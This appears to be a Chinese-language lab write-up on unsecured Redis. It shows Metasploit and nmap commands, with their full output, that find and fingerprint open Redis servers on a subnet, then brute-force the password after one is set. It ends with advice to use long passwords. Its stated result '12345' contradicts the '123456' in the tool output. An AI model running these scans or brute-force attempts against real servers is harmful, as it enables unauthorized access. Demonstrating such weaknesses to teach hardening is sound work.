IT,PMP,Design!
like movie,music,basketball&runner!
默认配置的redis是没有访问限制的,可以通过它获取大量系统信息。
1.msf批量探测redis服务器
msf > use auxiliary/scanner/misc/redis_server
msf auxiliary(redis_server) > set RHOSTS 192.168.73.0/24
RHOSTS => 192.168.73.0/24
msf auxiliary(redis_server) > set THREADS 10
THREADS => 10
msf auxiliary(redis_server) > run
[*] Scanning IP: 192.168.73.6
[*] Scanning IP: 192.168.73.4
[*] Scanning IP: 192.168.73.7
[*] Scanning IP: 192.168.73.3
[*] Scanning IP: 192.168.73.8
[*] Scanning IP: 192.168.73.9
[*] Scanning IP: 192.168.73.2
[*] Scanning IP: 192.168.73.1
......中略......
[*] Scanning IP: 192.168.73.130
[*] Redis Server Information $1908
# Server
redis_version:3.0.0
redis_git_sha1:00000000
redis_git_dirty:0
redis_build_id:715d8a91e5cdbe8e
redis_mode:standalone
os:Linux 2.6.32-131.0.15.el6.x86_64 x86_64
arch_bits:64
multiplexing_api:epoll
gcc_version:4.4.5
process_id:2582
run_id:4c0b8728104158f8090a2591525d3aa49acbbc94
tcp_port:6379
uptime_in_seconds:51800
uptime_in_days:0
hz:10
lru_clock:4811114
config_file:/etc/redis.conf
# Clients
connected_clients:1
client_longest_output_list:0
client_biggest_input_buf:0
blocked_clients:0
# Memory
used_memory:815944
used_memory_human:796.82K
used_memory_rss:7950336
used_memory_peak:815944
used_memory_peak_human:796.82K
used_memory_lua:35840
mem_fragmentation_ratio:9.74
mem_allocator:jemalloc-3.6.0
# Persistence
loading:0
rdb_changes_since_last_save:0
rdb_bgsave_in_progress:0
rdb_last_save_time:1430822674
rdb_last_bgsave_status:ok
rdb_last_bgsave_time_sec:-1
rdb_current_bgsave_time_sec:-1
aof_enabled:0
aof_rewrite_in_progress:0
aof_rewrite_scheduled:0
aof_last_rewrite_time_sec:-1
aof_current_rewrite_time_sec:-1
aof_last_bgrewrite_status:ok
aof_last_write_status:ok
# Stats
total_connections_received:1
total_commands_processed:1
instantaneous_ops_per_sec:0
total_net_input_bytes:12
total_net_output_bytes:7
instantaneous_input_kbps:0.00
instantaneous_output_kbps:0.00
rejected_connections:0
sync_full:0
sync_partial_ok:0
sync_partial_err:0
expired_keys:0
evicted_keys:0
keyspace_hits:0
keyspace_misses:0
pubsub_channels:0
pubsub_patterns:0
latest_fork_usec:0
migrate_cached_sockets:0
# Replication
role:master
connected_slaves:0
master_repl_offset:0
repl_backlog_active:0
repl_backlog_size:1048576
repl_backlog_first_byte_offset:0
repl_backlog_histlen:0
# CPU
used_cpu_sys:2.21
used_cpu_user:1.04
used_cpu_sys_children:0.00
used_cpu_user_children:0.00
# Cluster
cluster_enabled:0
# Keyspace
探测出192.168.73.130主机上安装有redis,且没有访问限制,于是进一步探测出系统信息,有利于后续的渗透操作。
2.换个姿势获取信息——nmap
root@kali:~# nmap -p 6379 192.168.73.130 --script redis-info.nse
Starting Nmap 6.47 ( https://nmap.org ) at 2015-05-05 21:30 EDT
Nmap scan report for 192.168.73.130
Host is up (0.00025s latency).
PORT STATE SERVICE
6379/tcp open unknown
| redis-info:
| Version 3.0.0
| Operating System Linux 2.6.32-131.0.15.el6.x86_64 x86_64
| Architecture 64 bits
| Process ID 9172
| Used CPU (sys) 0.03
| Used CPU (user) 0.00
| Connected clients 1
| Connected slaves 0
| Used memory 796.82K
|_ Role master
MAC Address: 00:0C:29:8C:1C:BB (VMware)
3.配置访问密码后再次探测——msf
在 redis.conf 中找到“requirepass”字段,在后面填上需要的密码,如
#
requirepass 123456
#
再次执行msf
msf auxiliary(redis_server) > run
[*] Scanning IP: 192.168.73.130
[-] 192.168.73.130 does not have a Redis server
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
探测失败
4.配置访问密码后再次探测——nmap
root@kali:~# nmap -p 6379 192.168.73.130 --script redis-info.nse
Starting Nmap 6.47 ( https://nmap.org ) at 2015-05-05 21:33 EDT
Nmap scan report for 192.168.73.130
Host is up (0.00030s latency).
PORT STATE SERVICE
6379/tcp open unknown
| redis-info:
|_ ERROR: Authentication required
MAC Address: 00:0C:29:8C:1C:BB (VMware)
探测失败
5.遇佛杀佛——nmap破解redis密码
root@kali:~# nmap -p 6379 192.168.73.130 --script redis-brute
Starting Nmap 6.47 ( https://nmap.org ) at 2015-05-05 22:13 EDT
Nmap scan report for 192.168.73.130
Host is up (0.00033s latency).
PORT STATE SERVICE
6379/tcp open unknown
| redis-brute:
| Accounts
| 123456 - Valid credentials
| Statistics
|_ Performed 11 guesses in 1 seconds, average tps: 11
MAC Address: 00:0C:29:8C:1C:BB (VMware)
成功破解出密码:12345
配置强密码,建议15位以上,但并不意味着可以阻止暴力破解,只是增加破解难度而已